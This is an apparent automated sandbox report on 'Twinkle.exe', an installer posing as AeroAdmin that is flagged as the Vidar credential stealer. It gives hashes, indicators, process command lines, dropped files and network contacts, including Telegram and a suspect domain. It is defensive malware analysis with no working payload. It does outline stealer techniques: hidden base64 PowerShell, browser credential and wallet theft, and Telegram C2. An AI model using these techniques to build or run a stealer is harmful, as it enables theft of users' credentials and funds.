File name: Twinkle.exe

Full analysis: https://app.any.run/tasks/3afc061a-0884-4d5a-938c-81e1446f8d74
Verdict: Malicious activity
Threats:

Stealers are a category of malicious software designed to gain unauthorized access to users' information and transfer it to the attacker. The category includes various programs, each focused on a particular kind of data, such as files, passwords, and cryptocurrency. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: June 04, 2025, 18:36:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: delphi, inno, installer, aeroadmin, rmm-tool, telegram, vidar, stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5: 2E480D45B3A14A7D330A6659F4C78AF7
SHA1: 7D56024B074B9D6237B3C2271BC9347D5EA3AEC1
SHA256: 3529CE2A664CB63B3C59A50C55FF145BC2AED18DCD0760C3F8947D603FA07241
SSDEEP: 98304:2LVIF8P3n1BLHxtD59KEKjSvkNLB2Evzcl8c+ji/2OBn+5m3FgbbsjvXYmJj7cR6:fGpRAXwI480XPYbpBI36Kh

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may be distorted by user actions and is provided as is for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • AeroAdmin.exe (PID: 6456)
    • Actions look like stealing of personal data

      • AppLaunch.exe (PID: 732)
    • Steals credentials from Web Browsers

      • AppLaunch.exe (PID: 732)
    • VIDAR mutex has been found

      • AppLaunch.exe (PID: 732)
    • VIDAR has been detected (YARA)

      • AppLaunch.exe (PID: 732)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Twinkle.exe (PID: 5988)
      • Twinkle.exe (PID: 1512)
      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)
      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8356)
      • csc.exe (PID: 8672)
      • csc.exe (PID: 8384)
      • csc.exe (PID: 8440)
      • csc.exe (PID: 8572)
      • csc.exe (PID: 8612)
      • csc.exe (PID: 8788)
      • csc.exe (PID: 8804)
      • csc.exe (PID: 7492)
      • csc.exe (PID: 8704)
    • Reads the Windows owner or organization settings

      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)
    • Reads security settings of Internet Explorer

      • Twinkle.tmp (PID: 7488)
      • AppLaunch.exe (PID: 732)
    • There is functionality for taking screenshots (YARA)

      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)
    • Process drops legitimate windows executable

      • Twinkle.tmp (PID: 5236)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • AppLaunch.exe (PID: 732)
    • Searches for installed software

      • AppLaunch.exe (PID: 732)
    • Base64-obfuscated command line is found

      • AppLaunch.exe (PID: 732)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8384)
      • csc.exe (PID: 8356)
      • csc.exe (PID: 8440)
      • csc.exe (PID: 8612)
      • csc.exe (PID: 8704)
      • csc.exe (PID: 8572)
      • csc.exe (PID: 8672)
      • csc.exe (PID: 8804)
      • csc.exe (PID: 7492)
      • csc.exe (PID: 8788)
    • The process bypasses the loading of PowerShell profile settings

      • AppLaunch.exe (PID: 732)
    • The process hides an interactive prompt from the user

      • AppLaunch.exe (PID: 732)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)
    • Multiple wallet extension IDs have been found

      • AppLaunch.exe (PID: 732)
    • BASE64 encoded PowerShell command has been detected

      • AppLaunch.exe (PID: 732)
    • Starts POWERSHELL.EXE for commands execution

      • AppLaunch.exe (PID: 732)
  • INFO

    • Checks supported languages

      • Twinkle.tmp (PID: 7488)
      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • AeroAdmin.exe (PID: 6456)
      • Twinkle.tmp (PID: 5236)
      • AppLaunch.exe (PID: 732)
      • csc.exe (PID: 7576)
      • cvtres.exe (PID: 7928)
      • csc.exe (PID: 8160)
      • cvtres.exe (PID: 7228)
      • csc.exe (PID: 4220)
      • cvtres.exe (PID: 6072)
      • cvtres.exe (PID: 6436)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • cvtres.exe (PID: 8320)
      • csc.exe (PID: 8384)
      • cvtres.exe (PID: 8468)
      • cvtres.exe (PID: 8428)
    • Creates files in a temporary directory

      • Twinkle.tmp (PID: 7488)
      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • Twinkle.tmp (PID: 5236)
      • powershell.exe (PID: 7296)
      • csc.exe (PID: 7576)
      • cvtres.exe (PID: 7928)
      • AppLaunch.exe (PID: 732)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 6392)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 4220)
      • powershell.exe (PID: 5596)
      • csc.exe (PID: 404)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 5248)
      • cvtres.exe (PID: 7228)
      • cvtres.exe (PID: 8320)
      • csc.exe (PID: 8248)
      • cvtres.exe (PID: 8428)
      • csc.exe (PID: 8356)
    • Reads the computer name

      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)
      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)
    • Process checks computer location settings

      • Twinkle.tmp (PID: 7488)
    • Compiled with Borland Delphi (YARA)

      • Twinkle.tmp (PID: 5236)
      • Twinkle.exe (PID: 5988)
    • AEROADMIN has been detected

      • Twinkle.tmp (PID: 5236)
    • The sample was compiled with English language support

      • Twinkle.tmp (PID: 5236)
    • Reads the machine GUID from the registry

      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)
      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8384)
    • Detects InnoSetup installer (YARA)

      • Twinkle.exe (PID: 5988)
      • Twinkle.tmp (PID: 5236)
    • Creates files or folders in the user directory

      • Twinkle.tmp (PID: 5236)
      • AppLaunch.exe (PID: 732)
    • Reads product name

      • AppLaunch.exe (PID: 732)
    • Checks proxy server information

      • AppLaunch.exe (PID: 732)
    • Reads CPU info

      • AppLaunch.exe (PID: 732)
    • Reads the software policy settings

      • AppLaunch.exe (PID: 732)
      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 7780)
      • powershell.exe (PID: 5596)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 5248)
    • Reads Environment values

      • AppLaunch.exe (PID: 732)
    • Creates files in the program directory

      • AppLaunch.exe (PID: 732)
    • Manual execution by a user

      • AppLaunch.exe (PID: 732)
    • Application launched itself

      • chrome.exe (PID: 7188)
      • chrome.exe (PID: 5344)
      • chrome.exe (PID: 5812)
      • chrome.exe (PID: 5308)
      • chrome.exe (PID: 7568)
      • chrome.exe (PID: 668)
      • chrome.exe (PID: 4784)
      • chrome.exe (PID: 7472)
      • chrome.exe (PID: 8172)
      • chrome.exe (PID: 8132)
      • chrome.exe (PID: 4608)
      • chrome.exe (PID: 8096)
      • chrome.exe (PID: 6040)
      • chrome.exe (PID: 3176)
      • chrome.exe (PID: 7688)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 5596)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 5248)
      • powershell.exe (PID: 7780)
      • powershell.exe (PID: 5868)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 7684)
No malware configuration.

TRiD

.exe | Inno Setup installer (34.1)
.exe | InstallShield setup (13.3)
.exe | Win32 EXE PECompact compressed (generic) (12.9)
.exe | Win32 Executable (generic) (1.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:13 06:55:45+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 704512
InitializedDataSize: 162304
UninitializedDataSize: -
EntryPoint: 0xacfe0
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 3.7.8.6
ProductVersionNumber: 3.7.8.6
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName: AeroAdmin LLC
FileDescription: AeroAdmin
FileVersion: 3.7.8.6
LegalCopyright: AeroAdmin
OriginalFileName: AeroAdmin.exe
ProductName: AeroAdmin
ProductVersion: 3.7.8.6
No data.
Total processes: 248
Monitored processes: 127
Malicious processes: 5
Suspicious processes: 11

Behavior graph

[Behavior graph: only the node labels survive extraction. The chain starts with twinkle.exe, twinkle.tmp, twinkle.exe, twinkle.tmp and aeroadmin.exe; applaunch.exe is tagged #VIDAR and is followed by chrome.exe, powershell.exe and conhost.exe nodes, repeated csc.exe and cvtres.exe pairs, and a slui.exe node. Nodes marked "no specs" carried no signatures.]

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID 404
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lumqg3sq.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll

PID 496
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffc899edc40,0x7ffc899edc4c,0x7ffc899edc58
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 0
Version: 122.0.6261.70
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll

PID 540
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 660
CMD: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3125.tmp" "c:\Users\admin\AppData\Local\Temp\CSC9910A5CF725E48348BE5586C2289459B.TMP"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 14.32.31326.0
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll

PID 668
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe"
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: AppLaunch.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 21
Version: 122.0.6261.70
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll

PID 732
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft .NET ClickOnce Launch Utility
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll

PID 1040
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 1120
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=2356 --field-trial-handle=2088,i,7045832297718548399,17298135265216829527,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: LOW
Description: Google Chrome
Exit code: 0
Version: 122.0.6261.70
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll

PID 1132
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID 1300
CMD: C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: AppLaunch.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll

Total events: 91 985
Read events: 91 931
Write events: 54
Delete events: 0

Modification events

(PID) Process: (732) AppLaunch.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (732) AppLaunch.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (732) AppLaunch.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (7188) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: failed_count
Value: 0

(PID) Process: (7188) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: state
Value: 2

(PID) Process: (7188) chrome.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation: write
Name: usagestats
Value: 0

(PID) Process: (7188) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: state
Value: 1

(PID) Process: (7188) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value: 0

(PID) Process: (5812) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: failed_count
Value: 0

(PID) Process: (5812) chrome.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: state
Value: 2
Executable files: 49
Suspicious files: 36
Text files: 314
Unknown types: 93

Dropped files

PID | Process | Filename | Type
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\.gitignore | text
MD5: 2529E845806D223AFB1FF7DCDEAB55D4
SHA256: 181314065DF2F2FDAF920B1A8B5311DAA216A2D6489A06ADA5B49CC514D89417
5988 | Twinkle.exe | C:\Users\admin\AppData\Local\Temp\is-O932H.tmp\Twinkle.tmp | executable
MD5: 47BC7301474646DA031D126011237082
SHA256: 82E4D5D34B2C9D3A522E67819CABE68610E7CC92F8525E3FDE9D02F2EB11C4F2
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-D2H2B.tmp | executable
MD5: ABE709E373ABA84C8D50C15D9F1B4816
SHA256: E1CF3B8C94E022746799BF2F20EF483F921AFDBC0BA0B821E9E8C1C9AE90A6CD
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\VBoxRes.dll | executable
MD5: FA8CC3EA706186037D74F024CC4E5EB1
SHA256: 17C27CA7A122909675E3B5D48EEF7652583C9823BA2BDD2CDBC278DDEF2CB188
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-REHTR.tmp | executable
MD5: 58B80D366D68B524E1B4FBB4C7DBC511
SHA256: E3893C35187B0DD848758979EBD0D766FC99F918EC9E685297F7D6CA080F122D
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\libupnp_plugin.dll | executable
MD5: E2970A14944FD74286BD6930F852178B
SHA256: 5325B2D91E8D2FB07FC0C3AFE0FB669AD6AD95D17A76E175F4611197FACC1CF6
5236 | Twinkle.tmp | C:\Users\admin\AppData\Local\Temp\is-8GOL6.tmp\_isetup\_setup64.tmp | executable
MD5: E4211D6D009757C078A9FAC7FF4F03D4
SHA256: 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-4UMEC.tmp | executable
MD5: E2970A14944FD74286BD6930F852178B
SHA256: 5325B2D91E8D2FB07FC0C3AFE0FB669AD6AD95D17A76E175F4611197FACC1CF6
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\is-I4BGE.tmp | text
MD5: 2529E845806D223AFB1FF7DCDEAB55D4
SHA256: 181314065DF2F2FDAF920B1A8B5311DAA216A2D6489A06ADA5B49CC514D89417
5236 | Twinkle.tmp | C:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\is-K68FQ.tmp | executable
MD5: 9AACD65DC0DD646E37210F551C0BBCF8
SHA256: 657560246FEF45B29D315A530959D311A35461977B750C4AEEABC2EDC18616C4
HTTP(S) requests: 8
TCP/UDP connections: 66
DNS requests: 55
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
516 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted
516 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | - | - | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
864 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
732 | AppLaunch.exe | GET | 200 | 23.209.213.129:80 | http://x1.c.lencr.org/ | unknown | - | - | whitelisted
732 | AppLaunch.exe | GET | 200 | 108.156.60.38:80 | http://e5.c.lencr.org/36.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 51.104.136.2:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
5496 | MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
7736 | RUXIMICS.exe | 51.104.136.2:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
864 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
6544 | svchost.exe | 20.190.159.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6544 | svchost.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted

DNS requests

Domain | IP | Reputation
google.com | 142.250.185.78 | whitelisted
crl.microsoft.com | 2.16.168.114, 2.16.168.124 | whitelisted
www.microsoft.com | 2.23.246.101 | whitelisted
login.live.com | 20.190.159.64, 40.126.31.67, 20.190.159.131, 20.190.159.23, 40.126.31.131, 20.190.159.75, 40.126.31.2, 20.190.159.71 | whitelisted
ocsp.digicert.com | 2.23.77.188 | whitelisted
client.wns.windows.com | 172.211.123.248 | whitelisted
slscr.update.microsoft.com | 20.109.210.53 | whitelisted
fe3cr.delivery.mp.microsoft.com | 52.165.164.15 | whitelisted
t.me | 149.154.167.99 | whitelisted
51.e1.4t.com | 116.202.3.169 | unknown

Threats

PID | Process | Class | Message
732 | AppLaunch.exe | Misc activity | ET INFO Observed Telegram Domain (t .me in TLS SNI)
No debug info